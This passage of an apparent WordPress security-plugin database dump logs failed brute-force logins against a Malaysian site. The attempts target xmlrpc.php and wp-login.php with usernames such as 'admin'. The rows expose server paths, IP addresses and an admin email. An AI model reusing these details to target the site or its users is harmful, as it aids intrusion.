20:33:28',18308696,19592272,'http://bintara.com.my/test/xmlrpc.php',1,0,'132.148.105.8'),(23239,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCHoir4pgxiIHnHK4pnwAAAc4\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"182.50.135.32\";s:11:\"REMOTE_PORT\";s:5:\"37248\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCHoir4pgxiIHnHK4pnwAAAc4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851614.6455\";s:12:\"REQUEST_TIME\";s:10:\"1566851614\";}}','notice','2019-08-26 20:33:37','2019-08-26 20:33:35',18315664,19505096,'http://bintara.com.my/new/xmlrpc.php',1,0,'182.50.135.32'),(23240,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCHmXkG1atThADMYGPOwAAANU\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"198.147.29.234\";s:11:\"REMOTE_PORT\";s:5:\"36462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCHmXkG1atThADMYGPOwAAANU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851614.9675\";s:12:\"REQUEST_TIME\";s:10:\"1566851614\";}}','notice','2019-08-26 20:33:37','2019-08-26 20:33:35',18310992,19501760,'http://bintara.com.my/new/xmlrpc.php',1,0,'198.147.29.234'),(23241,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCHxTEVi0fEJEHuDZXlAAAAAE\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"184.168.152.81\";s:11:\"REMOTE_PORT\";s:5:\"13259\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCHxTEVi0fEJEHuDZXlAAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851615.7608\";s:12:\"REQUEST_TIME\";s:10:\"1566851615\";}}','notice','2019-08-26 20:33:38','2019-08-26 20:33:36',18315488,19505792,'http://bintara.com.my/new/xmlrpc.php',1,0,'184.168.152.81'),(23242,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"338\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCHx90bn5mtr-PXqq3-gAAAE0\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"184.168.193.97\";s:11:\"REMOTE_PORT\";s:5:\"56031\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCHx90bn5mtr-PXqq3-gAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851615.6894\";s:12:\"REQUEST_TIME\";s:10:\"1566851615\";}}','notice','2019-08-26 20:33:38','2019-08-26 20:33:36',18310408,19501008,'http://bintara.com.my/new/xmlrpc.php',1,0,'184.168.193.97'),(23243,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/new/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCIR90bn5mtr-PXqq3-wAAAEM\";s:12:\"REDIRECT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.251.237.30\";s:11:\"REMOTE_PORT\";s:5:\"58035\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/new/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/new/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCIR90bn5mtr-PXqq3-wAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851617.5721\";s:12:\"REQUEST_TIME\";s:10:\"1566851617\";}}','notice','2019-08-26 20:33:40','2019-08-26 20:33:37',18299624,19501088,'http://bintara.com.my/new/xmlrpc.php',1,0,'103.251.237.30'),(23429,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.142.36\";s:11:\"REMOTE_PORT\";s:5:\"58833\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUUR4tV65@1l3w0lHOG4QAAAFU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566905422.4774\";s:12:\"REQUEST_TIME\";s:10:\"1566905422\";}}','notice','2019-08-27 11:30:24','2019-08-27 11:30:22',17684600,19175656,'https://bintara.com.my/wp-login.php',1,0,'104.236.142.36'),(23430,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.142.36\";s:11:\"REMOTE_PORT\";s:5:\"60029\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUUUQ0@TGWC-1tzGX6JigAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566905430.0918\";s:12:\"REQUEST_TIME\";s:10:\"1566905430\";}}','notice','2019-08-27 11:30:32','2019-08-27 11:30:30',18289624,19588576,'https://bintara.com.my/xmlrpc.php',1,0,'104.236.142.36'),(23431,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"202.92.4.57\";s:11:\"REMOTE_PORT\";s:5:\"38552\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWUWdYtV65@1l3w0lHOIKgAAAFE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566905973.8592\";s:12:\"REQUEST_TIME\";s:10:\"1566905973\";}}','notice','2019-08-27 11:39:35','2019-08-27 11:39:34',17681952,19172456,'https://bintara.com.my/wp-login.php',1,0,'202.92.4.57'),(23432,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 